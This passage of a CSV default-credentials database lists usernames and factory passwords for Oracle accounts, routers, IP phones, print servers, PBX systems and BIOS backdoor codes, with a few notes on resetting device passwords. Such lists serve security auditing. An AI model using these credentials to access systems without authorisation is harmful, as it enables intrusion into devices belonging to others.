COMPANY,,,\noracle,Oracle,,,COMPIERE,COMPIERE,,,\noracle,Oracle,,,CQSCHEMAUSER,PASSWORD,,,\noracle,Oracle,,,CSMIG,CSMIG,,,\noracle,Oracle,,,CTXDEMO,CTXDEMO,,,\noracle,Oracle,,,CTXSYS,CTXSYS,,,\noracle,Oracle,,,DBI,MUMBLEFRATZ,,,\noracle,Oracle,,,DBSNMP,DBSNMP,,,\noracle,Oracle,,,DEMO8,DEMO8,,,\noracle,Oracle,,,DEMO9,DEMO9,,,\noracle,Oracle,,,DES,DES,,,\noracle,Oracle,,,DEV2000_DEMOS,DEV2000_DEMOS,,,\noracle,Oracle,,,DIP,DIP,,,\noracle,Oracle,,,DISCOVERER_ADMIN,DISCOVERER_ADMIN,,,\noracle,Oracle,,,DSGATEWAY,DSGATEWAY,,,\noracle,Oracle,,,DSSYS,DSSYS,,,\noracle,Oracle,,,EJSADMIN,EJSADMIN,,,\noracle,Oracle,,,EMP,EMP,,,\noracle,Oracle,,,ESTOREUSER,ESTORE,,,\noracle,Oracle,,,EVENT,EVENT,,,\noracle,Oracle,,,EXFSYS,EXFSYS,,,\noracle,Oracle,,,FINANCE,FINANCE,,,\noracle,Oracle,,,FND,FND,,,\noracle,Oracle,,,FROSTY,SNOWMAN,,,\noracle,Oracle,,,GL,GL,,,\noracle,Oracle,,,GPFD,GPFD,,,\noracle,Oracle,,,GPLD,GPLD,,,\noracle,Oracle,,,HCPARK,HCPARK,,,\noracle,Oracle,,,HLW,HLW,,,\noracle,Oracle,,,HR,HR,,,\noracle,Oracle,,,IMAGEUSER,IMAGEUSER,,,\noracle,Oracle,,,IMEDIA,IMEDIA,,,\noracle,Oracle,,,JMUSER,JMUSER,,,\noracle,Oracle,,,JONES,STEEL,,,\noracle,Oracle,,,JWARD,AIROPLANE,,,\noracle,Oracle,,,L2LDEMO,L2LDEMO,,,\noracle,Oracle,,,LBACSYS,LBACSYS,,,\noracle,Oracle,,,LIBRARIAN,SHELVES,,,\noracle,Oracle,,,MASTER,PASSWORD,,,\noracle,Oracle,,,MDDEMO,MDDEMO,,,\noracle,Oracle,,,MDDEMO_CLERK,CLERK,,,\noracle,Oracle,,,MDDEMO_MGR,MGR,,,\noracle,Oracle,,,MDSYS,MDSYS,,,\noracle,Oracle,,,MFG,MFG,,,\noracle,Oracle,,,MGWUSER,MGWUSER,,,\noracle,Oracle,,,MIGRATE,MIGRATE,,,\noracle,Oracle,,,MILLER,MILLER,,,\noracle,Oracle,,,MMO2,MMO2,,,\noracle,Oracle,,,MODTEST,YES,,,\noracle,Oracle,,,MOREAU,MOREAU,,,\noracle,Oracle,,,MTSSYS,MTSSYS,,,\noracle,Oracle,,,MTS_USER,MTS_PASSWORD,,,\noracle,Oracle,,,MXAGENT,MXAGENT,,,\noracle,Oracle,,,NAMES,NAMES,,,\noracle,Oracle,,,OAS_PUBLIC,OAS_PUBLIC,,,\noracle,Oracle,,,OCITEST,OCITEST,,,\noracle,Oracle,,,ODM,ODM,,,\noracle,Oracle,,,ODM_MTR,MTRPW,,,\noracle,Oracle,,,ODS,ODS,,,\noracle,Oracle,,,ODSCOMMON,ODSCOMMON,,,\noracle,Oracle,,,OE,OE,,,\noracle,Oracle,,,OEMADM,OEMADM,,,\noracle,Oracle,,,OEMREP,OEMREP,,,\noracle,Oracle,,,OLAPDBA,OLAPDBA,,,\noracle,Oracle,,,OLAPSVR,INSTANCE,,,\noracle,Oracle,,,OLAPSYS,MANAGER,,,\noracle,Oracle,,,OMWB_EMULATION,ORACLE,,,\noracle,Oracle,,,OO,OO,,,\noracle,Oracle,,,OPENSPIRIT,OPENSPIRIT,,,\noracle,Oracle,,,ORACACHE,(random password),,,\noracle,Oracle,,,ORAREGSYS,ORAREGSYS,,,\noracle,Oracle,,,ORASSO,ORASSO,,,\noracle,Oracle,,,ORDPLUGINS,ORDPLUGINS,,,\noracle,Oracle,,,ORDSYS,ORDSYS,,,\noracle,Oracle,,,OSE$HTTP$ADMIN,(random password),,,\noracle,Oracle,,,OSP22,OSP22,,,\noracle,Oracle,,,OUTLN,OUTLN,,,\noracle,Oracle,,,OWA,OWA,,,\noracle,Oracle,,,OWA_PUBLIC,OWA_PUBLIC,,,\noracle,Oracle,,,OWNER,OWNER,,,\noracle,Oracle,,,PANAMA,PANAMA,,,\noracle,Oracle,,,PATROL,PATROL,,,\noracle,Oracle,,,PERFSTAT,PERFSTAT,,,\noracle,Oracle,,,PLEX,PLEX,,,\noracle,Oracle,,,PLSQL,SUPERSECRET,,,\noracle,Oracle,,,PM,PM,,,\noracle,Oracle,,,PO,PO,,,\noracle,Oracle,,,PO7,PO7,,,\noracle,Oracle,,,PORTAL30,PORTAL30,,,\noracle,Oracle,,,PORTAL30_DEMO,PORTAL30_DEMO,,,\noracle,Oracle,,,PORTAL30_PUBLIC,PORTAL30_PUBLIC,,,\noracle,Oracle,,,PORTAL30_SSO,PORTAL30_SSO,,,\noracle,Oracle,,,PORTAL30_SSO_PS,PORTAL30_SSO_PS,,,\noracle,Oracle,,,PORTAL30_SSO_PUBLIC,PORTAL30_SSO_PUBLIC,,,\noracle,Oracle,,,POWERCARTUSER,POWERCARTUSER,,,\noracle,Oracle,,,PRIMARY,PRIMARY,,,\noracle,Oracle,,,PUBSUB,PUBSUB,,,\noracle,Oracle,,,PUBSUB1,PUBSUB1,,,\noracle,Oracle,,,QDBA,QDBA,,,\noracle,Oracle,,,QS,QS,,,\noracle,Oracle,,,QS_ADM,QS_ADM,,,\noracle,Oracle,,,QS_CB,QS_CB,,,\noracle,Oracle,,,QS_CBADM,QS_CBADM,,,\noracle,Oracle,,,QS_CS,QS_CS,,,\noracle,Oracle,,,QS_ES,QS_ES,,,\noracle,Oracle,,,QS_OS,QS_OS,,,\noracle,Oracle,,,QS_WS,QS_WS,,,\noracle,Oracle,,,RE,RE,,,\noracle,Oracle,,,REPADMIN,REPADMIN,,,\noracle,Oracle,,,REPORTS_USER,OEM_TEMP,,,\noracle,Oracle,,,REP_MANAGER,DEMO,,,\noracle,Oracle,,,REP_OWNER,REP_OWNER,,,\noracle,Oracle,,,RMAIL,RMAIL,,,\noracle,Oracle,,,RMAN,RMAN,,,\noracle,Oracle,,,SAMPLE,SAMPLE,,,\noracle,Oracle,,,SAP,SAPR3,,,\noracle,Oracle,,,SDOS_ICSAP,SDOS_ICSAP,,,\noracle,Oracle,,,SECDEMO,SECDEMO,,,\noracle,Oracle,,,SERVICECONSUMER1,SERVICECONSUMER1,,,\noracle,Oracle,,,SH,SH,,,\noracle,Oracle,,,SITEMINDER,SITEMINDER,,,\noracle,Oracle,,,SLIDE,SLIDEPW,,,\noracle,Oracle,,,STARTER,STARTER,,,\noracle,Oracle,,,STRAT_USER,STRAT_PASSWD,,,\noracle,Oracle,,,SWPRO,SWPRO,,,\noracle,Oracle,,,SWUSER,SWUSER,,,\noracle,Oracle,,,SYMPA,SYMPA,,,\noracle,Oracle,,,SYS,D_SYSPW,,,\noracle,Oracle,,,SYSADM,SYSADM,,,\noracle,Oracle,,,SYSMAN,OEM_TEMP,,,\noracle,Oracle,,,SYSTEM,D_SYSTPW,,,\noracle,Oracle,,,TAHITI,TAHITI,,,\noracle,Oracle,,,TDOS_ICSAP,TDOS_ICSAP,,,\noracle,Oracle,,,TESTPILOT,TESTPILOT,,,\noracle,Oracle,,,TRACESVR,TRACE,,,\noracle,Oracle,,,TRAVEL,TRAVEL,,,\noracle,Oracle,,,TSDEV,TSDEV,,,\noracle,Oracle,,,TSUSER,TSUSER,,,\noracle,Oracle,,,TURBINE,TURBINE,,,\noracle,Oracle,,,ULTIMATE,ULTIMATE,,,\noracle,Oracle,,,USER,USER,,,\noracle,Oracle,,,USER0,USER0,,,\noracle,Oracle,,,USER1,USER1,,,\noracle,Oracle,,,USER2,USER2,,,\noracle,Oracle,,,USER3,USER3,,,\noracle,Oracle,,,USER4,USER4,,,\noracle,Oracle,,,USER5,USER5,,,\noracle,Oracle,,,USER6,USER6,,,\noracle,Oracle,,,USER7,USER7,,,\noracle,Oracle,,,USER8,USER8,,,\noracle,Oracle,,,USER9,USER9,,,\noracle,Oracle,,,UTLBSTATU,UTLESTAT,,,\noracle,Oracle,,,VIDEOUSER,VIDEO USER,,,\noracle,Oracle,,,VIF_DEVELOPER,VIF_DEV_PWD,,,\noracle,Oracle,,,VIRUSER,VIRUSER,,,\noracle,Oracle,,,VRR1,VRR1,,,\noracle,Oracle,,,WEBCAL01,WEBCAL01,,,\noracle,Oracle,,,WEBDB,WEBDB,,,\noracle,Oracle,,,WEBREAD,WEBREAD,,,\noracle,Oracle,,,WKSYS,WKSYS,,,\noracle,Oracle,,,WWW,WWW,,,\noracle,Oracle,,,WWWUSER,WWWUSER,,,\noracle,Oracle,,,XPRT,XPRT,,,\noracle,Oracle,,,demo,demo,,,\noracle,Oracle,,,internal,oracle,,,\noracle,Oracle,,,oracle,oracle,,,\noracle,Oracle,,,scott,tiger or tigger,,,\noracle,Oracle,,,sys,sys,,,\noracle,Oracle,,,system,manager,,,\noracle,Personal Oracle,,,PO8,PO8,,,\noracle,Personal Oracle,,8,PO8,PO8,,,\noracle,Personal Oracle,8,Multi,PO8,PO8,,,\noracle,Sun Java System Access Manager,,,admin,adminadmin,,,\noracle,Web DB,,,webdb,webdb,,,\noracle,Web DB,,Admin,webdb,webdb,,,\noracle,Web DB,,HTTP,webdb,webdb,Admin,,\norange,livebox,,,admin,admin,,,\nosicom,JETXPrint,,1000E/B,sysadm,sysadm,,,\nosicom,JETXPrint,,1000E/N,sysadm,sysadm,,,\nosicom,JETXPrint,,1000T/N,sysadm,sysadm,,,\nosicom,JETXPrint,,500 E/B,sysadm,sysadm,,,\nosicom,JETXPrint,,Admin,sysadm,sysadm,,,\nosicom,JETXPrint,1000E/B,Telnet,sysadm,sysadm,Admin,,\nosicom,JETXPrint,1000E/N,Telnet,sysadm,sysadm,Admin,,\nosicom,JETXPrint,1000T/N,Telnet,sysadm,sysadm,Admin,,\nosicom,JETXPrint,500 E/B,Telnet,sysadm,sysadm,Admin,,\nosicom,NETCommuter Remote Access Server,,,Manager,Manager,,,\nosicom,NETCommuter Remote Access Server,,,debug,d.e.b.u.g,,,\nosicom,NETCommuter Remote Access Server,,,echo,echo,,,\nosicom,NETCommuter Remote Access Server,,,guest,guest,,,\nosicom,NETCommuter Remote Access Server,,,sysadm,sysadm,,,\nosicom,NETCommuter Remote Access Server,,Admin,Manager,Manager,,,\nosicom,NETCommuter Remote Access Server,,Admin,sysadm,sysadm,,,\nosicom,NETCommuter Remote Access Server,,Telnet,Manager,Manager,Admin,,\nosicom,NETCommuter Remote Access Server,,Telnet,debug,d.e.b.u.g,User,,\nosicom,NETCommuter Remote Access Server,,Telnet,echo,echo,User,,\nosicom,NETCommuter Remote Access Server,,Telnet,guest,guest,User,,\nosicom,NETCommuter Remote Access Server,,Telnet,sysadm,sysadm,Admin,,\nosicom,NETCommuter Remote Access Server,,User,debug,d.e.b.u.g,,,\nosicom,NETCommuter Remote Access Server,,User,echo,echo,,,\nosicom,NETCommuter Remote Access Server,,User,guest,guest,,,\nosicom,NETPrint and JETX Print,500 1000 1500 and 2000 Series,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,,1000 T/B,sysadm,sysadm,,,\nosicom,NETPrint,,1000 T/N,sysadm,sysadm,,,\nosicom,NETPrint,,1000E/B,sysadm,sysadm,,,\nosicom,NETPrint,,1000E/D,Manager,Manager,,,\nosicom,NETPrint,,1000E/D,debug,d.e.b.u.g,,,\nosicom,NETPrint,,1000E/D,echo,echo,,,\nosicom,NETPrint,,1000E/D,guest,guest,,,\nosicom,NETPrint,,1000E/D,sysadm,sysadm,,,\nosicom,NETPrint,,1000E/N,sysadm,sysadm,,,\nosicom,NETPrint,,1000E/NDS,Manager,Manager,,,\nosicom,NETPrint,,1000E/NDS,debug,d.e.b.u.g,,,\nosicom,NETPrint,,1000E/NDS,echo,echo,,,\nosicom,NETPrint,,1000E/NDS,guest,guest,,,\nosicom,NETPrint,,1000E/NDS,sysadm,sysadm,,,\nosicom,NETPrint,,1500 E/B,Manager,Manager,,,\nosicom,NETPrint,,1500 E/B,debug,d.e.b.u.g,,,\nosicom,NETPrint,,1500 E/B,echo,echo,,,\nosicom,NETPrint,,1500 E/B,guest,guest,,,\nosicom,NETPrint,,1500 E/B,sysadm,sysadm,,,\nosicom,NETPrint,,1500E/N,Manager,Manager,,,\nosicom,NETPrint,,1500E/N,debug,d.e.b.u.g,,,\nosicom,NETPrint,,1500E/N,echo,echo,,,\nosicom,NETPrint,,1500E/N,guest,guest,,,\nosicom,NETPrint,,1500E/N,sysadm,sysadm,,,\nosicom,NETPrint,,1500T/N,sysadm,sysadm,,,\nosicom,NETPrint,,2000 T/B,sysadm,sysadm,,,\nosicom,NETPrint,,2000 T/N,sysadm,sysadm,,,\nosicom,NETPrint,,2000E/B,sysadm,sysadm,,,\nosicom,NETPrint,,2000E/N,Manager,Manager,,,\nosicom,NETPrint,,2000E/N,debug,d.e.b.u.g,,,\nosicom,NETPrint,,2000E/N,echo,echo,,,\nosicom,NETPrint,,2000E/N,guest,guest,,,\nosicom,NETPrint,,2000E/N,sysadm,sysadm,,,\nosicom,NETPrint,,500 E/B,sysadm,sysadm,,,\nosicom,NETPrint,,500 E/N,sysadm,sysadm,,,\nosicom,NETPrint,,500 T/B,sysadm,sysadm,,,\nosicom,NETPrint,,500 T/N,sysadm,sysadm,,,\nosicom,NETPrint,,Admin,Manager,Manager,,,\nosicom,NETPrint,,Admin,sysadm,sysadm,,,\nosicom,NETPrint,,User,debug,d.e.b.u.g,,,\nosicom,NETPrint,,User,echo,echo,,,\nosicom,NETPrint,,User,guest,guest,,,\nosicom,NETPrint,1000 T/B,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,1000 T/N,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,1000E/B,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,1000E/D,Telnet,Manager,Manager,Admin,,\nosicom,NETPrint,1000E/D,Telnet,debug,d.e.b.u.g,User,,\nosicom,NETPrint,1000E/D,Telnet,echo,echo,User,,\nosicom,NETPrint,1000E/D,Telnet,guest,guest,User,,\nosicom,NETPrint,1000E/D,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,1000E/N,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,1000E/NDS,Telnet,Manager,Manager,Admin,,\nosicom,NETPrint,1000E/NDS,Telnet,debug,d.e.b.u.g,User,,\nosicom,NETPrint,1000E/NDS,Telnet,echo,echo,User,,\nosicom,NETPrint,1000E/NDS,Telnet,guest,guest,User,,\nosicom,NETPrint,1000E/NDS,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,1500 E/B,Telnet,Manager,Manager,Admin,,\nosicom,NETPrint,1500 E/B,Telnet,debug,d.e.b.u.g,User,,\nosicom,NETPrint,1500 E/B,Telnet,echo,echo,User,,\nosicom,NETPrint,1500 E/B,Telnet,guest,guest,User,,\nosicom,NETPrint,1500 E/B,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,1500E/N,Telnet,Manager,Manager,Admin,,\nosicom,NETPrint,1500E/N,Telnet,debug,d.e.b.u.g,User,,\nosicom,NETPrint,1500E/N,Telnet,echo,echo,User,,\nosicom,NETPrint,1500E/N,Telnet,guest,guest,User,,\nosicom,NETPrint,1500E/N,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,1500T/N,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,2000 T/B,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,2000 T/N,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,2000E/B,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,2000E/N,Telnet,Manager,Manager,Admin,,\nosicom,NETPrint,2000E/N,Telnet,debug,d.e.b.u.g,User,,\nosicom,NETPrint,2000E/N,Telnet,echo,echo,User,,\nosicom,NETPrint,2000E/N,Telnet,guest,guest,User,,\nosicom,NETPrint,2000E/N,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,500 1000 1500 and 2000 Series,Telnet,Manager,Manager,Admin,,\nosicom,NETPrint,500 E/B,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,500 E/N,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,500 T/B,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,500 T/N,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,500,1000,1500, and 2000 Series,Telnet,Manager,Manager,Admin,,\nosicom,NETPrint,500,1000,1500, and 2000 Series,Telnet,debug,d.e.b.u.g,User,,\nosicom,NETPrint,500,1000,1500, and 2000 Series,Telnet,echo,echo,User,,\nosicom,NETPrint,500,1000,1500,and 2000 Series,Telnet,Manager,Manager\nosicom,NETPrint,500,1000,1500,and 2000 Series,Telnet,debug,d.e.b.u.g\nosicom,NETPrint,500,1000,1500,and 2000 Series,Telnet,echo,echo\nosicom,NetPrint,500,1000,1500, and 2000 Series,Telnet,guest,guest,User,,\nosicom,NetPrint,500,1000,1500,and 2000 Series,Telnet,guest,guest\nosicom,Osicom Plus T1/PLUS 56k,,,write,private,,,\nosicom,Osicom Plus T1/PLUS 56k,,Telnet,write,private,,,\nosicom,Osicom(Datacom),,,sysadm,sysadm,,,\notrs,OTRS,,,root@localhost,root,,,\novislink,1184AR,all,multi,admin,12345,admin,,\novislink,AirLive WIAS-1000G,,console,admin,admin,Admin,,\novislink,BudgeTone 100 series IP Phone,1.1.0.11,,,123,Config (End User),,\novislink,BudgeTone 100 series IP Phone,1.1.0.11,,,admin,Config (Advanced User),,\novislink,BudgeTone 200 series IP Phone,1.1.0.11,,,123,Config (End User),,\novislink,BudgeTone 200 series IP Phone,1.1.0.11,,,admin,Config (Advanced User),,\novislink,GXP-2000 IP Phone,1.0.1.9,http,,123,Config (End User),,\novislink,GXP-2000 IP Phone,1.0.1.9,http,,123,Config (End User),Need to get the IP from the phone's display,\novislink,GXP-2000 IP Phone,1.0.1.9,http,,admin,Config (Advanced User),,\novislink,HandyTone-286 analog telephone adaptor,,,,123,config,,\novislink,HandyTone-286 analog telephone adaptor,,,,admin,config,,\novislink,HandyTone-486 analog telephone adaptor,,,,123,config,,\novislink,HandyTone-486 analog telephone adaptor,,,,admin,config,,\novislink,HandyTone-488 analog telephone adaptor,,,,123,Config (End User),,\novislink,HandyTone-488 analog telephone adaptor,,,,admin,Config (Advanced User),,\novislink,HandyTone-496 analog telephone adaptor,,,,123,Config (End User),,\novislink,HandyTone-496 analog telephone adaptor,,,,admin,Config (Advanced User),,\novislink,IWE1100 WLAN to LAN Bridge,,,root,root,Admin,,\novislink,SHDSL Modem,B5.1 5-15-2002,,root,root,Admin,,\novislink,SHDSL Modem,B5.1 5-15-2002,,user,user,Admin,,\novislink,SR200 Router,,console,,,config,,\novislink,SR500 Broadband IP Gateway,5.0 and up,http://192.168.1.254,,,config,,\novislink,WL-1000UR,,http,admin,airlive,admin,,\novislink,WL-1120AP,,Multi,root,,Admin,,\novislink,WL-8000AP Wireless G,,192.168.1.252,12345,12345,Admin,,\novislink,WL-8000AP Wireless G,,http,12345,12345,Admin,,\novislink,evo-w301ar,1,http://192.168.1.1/,1234,1234,,,\novislink,wl-1120ap,,http://192.168.100.252,super,super,,universal password,\npachco,AeGIS 9000,All,Console,,0,Default master code - allows programming the unit,AeGIS 9000 entry intercom system - Hold 0 then # until scrolling stops then enter code.,\npachco,AeGIS 9000,All,Console,,0000,Default master code - allows programming the unit,AeGIS 9000 entry intercom system - Hold 0 then # until scrolling stops,\npacific micro data,MAST 9500 Universal Disk Array,,Admin,pmd,,,,\npacific micro data,MAST 9500 Universal Disk Array,,ESM ver. 2.11 / 1,pmd,,,,\npacificmicrodata,MAST 9500 Universal Disk Array,ESM ver. 2.11 / 1,Console,pmd,,Admin,,\npackard bell,PC BIOS,,,,bell9,,,\npackard bell,PC BIOS,,Admin,,bell9,,,\npackardbell,,EasyNote_MX37-U-103SP ,,administrador,1234,,,\npackardbell,,EasyNote_MX37-U-103SP,,administrador,1234,,,\npackardbell,PC BIOS,,,459441,459441,,,\npackardbell,PC BIOS,,Console,,bell9,Admin,,\npackardbell,zg5,,,,,,,\npacketeer,Packetshaper,,,,touchpwd=,,,\npanasonic,CF-27,4,Multi,,,Admin,,\npanasonic,CF-28,,Multi,,,Admin,,\npanasonic,CF-45,,Multi,,,Admin,,\npanasonic,KX-TD1232,,Multi,admin,1234,Admin,,\npanasonic,KX-TDA 100,V1.1 2.0 3.0,CONSOLE,,1234,,,\npanasonic,KX-TDA 200,V1.1 2.0 3.0,CONSOLE,,1234,,,\npanasonic,KX-TDA 30,V1.1 2.0 3.0,CONSOLE,,1234,,,\npanasonic,KX-TGP500,,10.1.1.12,admin,adminpass,Admin,,\npanasonic,Network Camera,,,admin,12345,,,\npanasonic,WV-NP240/244,V1.25-V1.50,http://192.168.0.10,admin,12345,,,\npandatel,EMUX,,,admin,admin,,,\npandatel,EMUX,,,admin,admin,,all,\nparallels,Plesk,,,admin,setup,,,\npatton,RAS,,2,monitor,monitor,,,\npatton,RAS,,2,superuser,superuser,,,\npatton,RAS,2,,monitor,monitor,,,\npatton,RAS,2,,superuser,superuser,,,\npbx,PBX (Generic),,,tech,nician,,,\npendo,AL300,,,,admin,Admin,,\npenril datability,vcp300 terminal server,,,,system,,,\npenril datability,vcp300 terminal server,,Admin,,system,,,\npenrildatability,vcp300 terminal server,,Multi,,system,Admin,,\npentagram,Cerberus ADSL modem + router,,HTTP,admin,password,Admin,,\npentaoffice,Sat Router,,Telnet,,pento,Admin,,\npentasafe,VigilEnt Security Manager,,3,PSEAdmin,$secure$,,,\npentasafe,VigilEnt Security Manager,,Admin,PSEAdmin,$secure$,,,\npentasafe,VigilEnt Security Manager,3,VigilEnt Security Manager Console,PSEAdmin,$secure$,Admin,,\npentasafe,VigilEnt Security Manager,3.0,VigilEnt Security Manager Console,PSEAdmin,$secure$,Admin,,\nperle,CS9000,any,Console,admin,superuser,Admin,,\nphilips,Praesideo PA System,,Admin,admin,admin,,,\nphilips,Praesideo PA System,,All versions,admin,admin,,,\nphilips,Praesideo PA System,All versions,Multi,admin,admin,Admin,,\nphoenix,4,6.0.2,Multi,,admin,Admin,,\nphoenix,4.0,,Admin,,admin,,,\nphoenix,4.0,6.0.2,Multi,,admin,Admin,,\nphoenix,PC BIOS,,console,,BIOS,Admin,Default/backdoor CMOS password,\nphoenix,PC BIOS,,console,,CMOS,Admin,Default/backdoor CMOS password,\nphoenix,PC BIOS,,console,,PHOENIX,Admin,Default/backdoor CMOS password,\nphoenix,PC BIOS,,console,,phoenix,Admin,Default/backdoor CMOS password,\nphoenix,Phoenix v1.14,,Multi,Administrator,admin,Admin,,\nphpliteadmin,phpLiteAdmin,,,,admin,,,\nphpreactor,PHPReactor,,1.2.7,core,phpreactor,,,\nphpreactor,PHPReactor,1.2.7,http,core,phpreactor,,,\nphptest,phpTest,,0.5.6,admin,1234,,,\nphptest,phpTest,,0.5.6,guest,guest,,,\nphptest,phpTest,0.5.6,http,admin,1234,Admin,,\nphptest,phpTest,0.5.6,http,guest,guest,,,\npirelli,,,,on,on,Admin,Used for OnTelecom,\npirelli,A255G,,http://192.168.1.254,Administrator,CPE.hgw.12,admin (root user),Macedonia,\npirelli,AGE ADSL Router,,Multi,admin,microbusiness,Admin,,\npirelli,AGE ADSL Router,,Multi,user,password,User,,\npirelli,DRG A225G,,,3play,3play,admin,,\npirelli,DRG A225G,SAPO,192.168.1.1,user,user,admin,,\npirelli,P.DG A4010G,1,http://192.168.1.1,admin,admin,Admin privilegies,HT Mostar,\npirelli,PRGAV4202N,,10.0.0.138,Telek0m,Austria&Eur0,,for Telekom Austria,\npirelli,PRGAV4202N,,10.0.0.138,Telek0m,AustriaEur0,,for Telekom Austria,\npirelli,Pirelli AGE-SB,,HTTP,admin,smallbusiness,Admin,,\npirelli,Pirelli AGE-UB,,HTTP,admin,microbusiness,Admin,,\npirelli,Pirelli Router,,Multi,admin,microbusiness,Admin,,\npirelli,Pirelli Router,,Multi,admin,mu,Admin,,\npirelli,Pirelli Router,,Multi,user,password,Admin,,\npirelli,p.dg a4010g,a-000-1a1-a4,http://192.168.1.1,admin,admin,admin,,\npivotalsoftware,RabbitMQ Management Plugin,,,guest,guest,,,\nplaintree,Waveswitch,,,,default.password,,,\nplanet,ADE-4000,,Multi,admin,epicrouter,Admin,,\nplanet,ADE-4110,,HTTP,admin,epicrouter,Admin,,\nplanet,Adsl router,,,admin,epicrouter,,,\nplanet,Adsl router,,Multi,admin,epicrouter,,,\nplanet,Akcess Point,,HTTP,admin,admin,Admin,,\nplanet,FGSW-2402RS,,serial,admin,ISPMODE,Admin,,\nplanet,FNSW-2402S,,,admin,<> just hit ENTER ,,,\nplanet,FNSW-2402S,,Console,admin,<> just hit ENTER,,,\nplanet,FNSW-2402S,,Console,admin,lt;gt; just hit ENTER,,,\nplanet,GRT-501,,http,root,root,full,,\nplanet,WAP-1900/1950/2000,,2.5.0,,default,,,\nplanet,WAP-1900/1950/2000,,Admin,,default,,,\nplanet,WAP-1900/1950/2000,2.5.0,Multi,,default,Admin,,\nplanet,XRT-401D,,HTTP,admin,1234,Admin,,\npokertrackersoftware,PokerTracker 3,,,postgres,svcPASS83,,,\npollsafe,Pollsafe,,,SMDR,SECONDARY,,,\npollsafe,Pollsafe,,modem,SMDR,SECONDARY,,,\npolycom,HDX-7000,,,Polycom,456,portal,,\npolycom,HDX-7000,,,admin,456,portal,,\npolycom,SoundPoint IP 601,,,Polycom,456,Device Admin (Web),Admin credentials for Web interface,\npolycom,Soundpoint VoIP phones,,HTTP,Polycom,SpIp,User,,\npolycom,Soundstation IP 3000,,http,administrator,**#,Admin,,\npolycom,Soundstation\\SoundPoint IP,,,Polycom,456,,,\npolycom,ViewStation 4000,,v.35,,,,,\npolycom,ViewStation 4000,3.5,Multi,,admin,Admin,,\npolycom,ViewStation 4000,3.5,Multi,,x6zynd56,update software,,\npolycom,iPower 9000,,Multi,,,Admin,,\npostgresql,PostgreSQL,,,postgres,,,,\npostgresql,PostgreSQL,,CLI,postgres,,Administrator,,\npowerchute,UPS,,,pwrchute,pwrchute,,,\nprestige,650,,,admin,1234,Admin,,\nprestigio,Nobile,156,Multi,,,Admin,,\nprime,PrimeOS,,,dos,dos,,,\nprime,PrimeOS,,,fam,fam,,,\nprime,PrimeOS,,,guest,guest,,,\nprime,PrimeOS,,,guest1,guest,,,\nprime,PrimeOS,,,mail,mail,,,\nprime,PrimeOS,,,maint,maint,,,\nprime,PrimeOS,,,mfd,mfd,,,\nprime,PrimeOS,,,netlink,netlink,,,\nprime,PrimeOS,,,prime,prime,,,\nprime,PrimeOS,,,primenet,primeos,,,\nprime,PrimeOS,,,primeos,primeos,,,\nprime,PrimeOS,,,primos_cs,prime,,,\nprime,PrimeOS,,,system,prime,,,\nprime,PrimeOS,,,system,system,,,\nprime,PrimeOS,,,tele,tele,,,\nprime,PrimeOS,,,test,test,,,\nprime,PrimeOS,,Admin,system,prime,,,\nprime,PrimeOS,,Admin,system,system,,,\nprime,PrimeOS,,Multi,dos,dos,User,,\nprime,PrimeOS,,Multi,fam,fam,User,,\nprime,PrimeOS,,Multi,guest,guest,User,,\nprime,PrimeOS,,Multi,guest1,guest,User,,\nprime,PrimeOS,,Multi,guest1,guest1,User,,\nprime,PrimeOS,,Multi,mail,mail,User,,\nprime,PrimeOS,,Multi,maint,maint,User,,\nprime,PrimeOS,,Multi,mfd,mfd,User,,\nprime,PrimeOS,,Multi,netlink,netlink,User,,\nprime,PrimeOS,,Multi,prime,prime,User,,\nprime,PrimeOS,,Multi,prime,primeos,User,,\nprime,PrimeOS,,Multi,primenet,primenet,User,,\nprime,PrimeOS,,Multi,primenet,primeos,User,,\nprime,PrimeOS,,Multi,primeos,prime,User,,\nprime,PrimeOS,,Multi,primeos,primeos,User,,\nprime,PrimeOS,,Multi,primos_cs,prime,User,,\nprime,PrimeOS,,Multi,primos_cs,primos,User,,\nprime,PrimeOS,,Multi,system,prime,Admin,,\nprime,PrimeOS,,Multi,system,system,Admin,,\nprime,PrimeOS,,Multi,tele,tele,User,,\nprime,PrimeOS,,Multi,test,test,User,,\nprime,PrimeOS,,User,guest,guest,,,\nprime,PrimeOS,,User,guest1,guest,,,\nprime,PrimeOS,,User,guest1,guest1,,,\nprime,PrimeOS,,User,mail,mail,,,\nprime,PrimeOS,,User,mfd,mfd,,,\nprime,PrimeOS,,User,netlink,netlink,,,\nprime,PrimeOS,,User,prime,prime,,,\nprime,PrimeOS,,User,primenet,primenet,,,\nprime,PrimeOS,,User,primenet,primeos,,,\nprime,PrimeOS,,User,primos_cs,prime,,,\nprime,PrimeOS,,User,primos_cs,primos,,,\nprime,PrimeOS,,User,tele,tele,,,\nprime,PrimeOS,,User,test,test,,,\nprimebase,SQL Database Server,,4.2,Administrator,,,,\nprimebase,SQL Server,4.2,,Administrator,,,,\nprocurve,V1810-24g,,192,168,2,10,,\nprolite,Tru-Color II,version 5,Remote Control,,,,,\nprolite,Tru-Color II,version 5,Remote Control,,,,No default password but if protected the password is always 4 characters and can be reset by unplugging the sign power and plugging it back in with remote ESC key held down during both steps.,\nprolite,Tru-Color II,version 6,Remote Control,,,,,\nprolite,Tru-Color II,version 6,Remote Control,,,,No default password but if protected the password is always 4 characters and can be reset by unplugging the sign power and plugging it back in with remote ESC key held down during both steps.,\nprolite,Tru-Color XP,version 8,Remote Control,,,,,\nprolite,Tru-Color XP,version 8,Remote Control,,,,No default password but if protected the password is always 4 characters and can be reset by unplugging the sign power and plugging it back in with remote ESC key held down 